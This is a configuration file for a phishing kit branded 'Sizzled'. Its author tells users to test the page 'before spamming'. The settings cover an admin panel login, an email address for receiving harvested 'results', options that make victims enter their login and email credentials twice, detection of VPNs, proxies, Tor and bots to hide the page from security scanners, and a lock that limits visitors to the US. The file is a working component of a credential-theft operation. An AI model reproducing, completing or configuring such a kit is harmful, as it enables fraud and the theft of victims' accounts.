;    ______  _____ _           __         __
;   / ____ \/ ___/(_)_______  / /__  ____/ /
;  / / __ `/\__ \/ /_  /_  / / / _ \/ __  / 
; / / /_/ /___/ / / / /_/ /_/ /  __/ /_/ /  
; \ \__,_//____/_/ /___/___/_/\___/\__,_/   
;  \____/                                   

; Always test your page before spamming
; & most importantly, have a good day !
;   - 🐺 Sizzled -

; Admin Panel Login
; Options: credentials

Username = "Admin"
Password = "Login@321!"

; Your email for results
; Options: email address

Email = "test@mail.com"

; Double login
; Options: on or off

LoginTwice = "on"

; Double email access
; Options: on or off

EmailTwice = "on"

; Whitelist your IP
; Use a VPN / Proxy !
; Options: IP or off

MyIP = "off"

; Proxy, Hosting, Tor detection
; Options: on or off

VPN = "on"

; Proxy, Hosting, Tor detection
; Not 100% reliable though
; Options: on or off

HeuristicVPN = "on"

; Special "cloudflare" protection
; will block 99% of bots in theory
; Options: on or off

CFProtection = "off"

; Allow access to a specific country
; Options: country code or off

CountryLock = "US"